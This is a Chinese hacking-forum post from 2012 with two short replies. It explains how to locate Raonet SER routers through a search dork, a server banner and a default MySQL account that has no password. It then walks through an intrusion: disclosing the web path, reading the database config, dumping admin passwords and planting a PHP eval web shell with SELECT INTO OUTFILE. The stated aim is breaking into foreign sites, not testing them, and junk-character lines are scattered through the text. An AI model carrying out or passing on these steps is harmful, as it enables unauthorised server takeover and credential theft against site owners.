中国网络渗透测试联盟
标题:
利用某路由器漏洞入侵国外站点
[打印本页]
作者:
admin
时间:
2012-12-10 10:30
标题:
利用某路由器漏洞入侵国外站点
寻找存在漏洞的路由器方法:
. \6 n* }8 s* J9 c$ `' ?
) J& A$ z v H# N
1:google搜索'Raonet Subscriber Ethernet Router'
) S a" R' ?& ?0 z9 c* `
+ `( s3 Y; i3 j; V e# A$ A" \" b, r
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
, |% D9 a( R8 O9 ]- O5 {* T/ \3 S
3 ~% x. A) C1 z. J; X% q$ h
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
+ |5 ~* C# ]7 X% ]# N) I1 S6 T
- J" i+ R# {2 u* ]/ Z- G
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
3 y0 q1 g y2 Q* ?
! f% X" ]- t8 }5 k b( D8 l! Z3 C
3 ^' n2 v; V3 ]+ D
- \; J+ r! F1 ^4 W0 A
入侵步骤:
! g/ _& E4 o! t8 d( F
! ]/ I5 o$ Z6 u2 W) }$ `9 u
1.爆web路径,
http://www.yu1u.org/src/jpgraph_line.php
: q6 O- S1 H4 S1 q4 T) h
+ \" H" ~4 S# _: p8 Y( W
2:查看数据库配置文件,
http://www.yu1u.org/inc/conn_db.inc
?1 U5 o; s$ w# V( W; t% ~0 h5 ?
3:得到密码后连接,查看GUI管理密码:
+ k5 M( x X) \6 Q9 @. @7 w
use ser_500
, I9 _# H* o9 G, C8 @6 E
select id,passwd from user;
7 o7 }# ]8 t+ U; C( i4 H( M
4:通过数据库写入webshell,执行命令:
) f/ v6 l/ d$ `' j& G0 [
use mysql;
D: U# S4 }6 h8 t, Y- Y& S
create table ok(cmd TEXT);
8 J1 I) k h" E1 d$ h4 c
insert into ok values("<?php @eval($_POST[cmd])?>");
* g p9 L/ _+ e* l- Y" k
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
6 r$ q/ Q a" Q& p2 ?" f0 r
drop table ok;
7 w0 X$ D% \! w( l. L( C- e
$ \2 o' K; P: `( U E7 B
5:连接后门shell.php
( ?, S P2 H" ?* ~1 l3 c
$ {6 \7 O/ o7 U; D* q
6. 搞定!
) `2 L6 L- |/ b* g$ V; w
- L& |7 }9 c0 ?" o. [% q
作者:
Anthony~
时间:
2013-7-27 20:06
这个后果可以很严重的说
作者:
jos666
时间:
2013-7-29 12:07
不错哦,黑服务器补洞。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2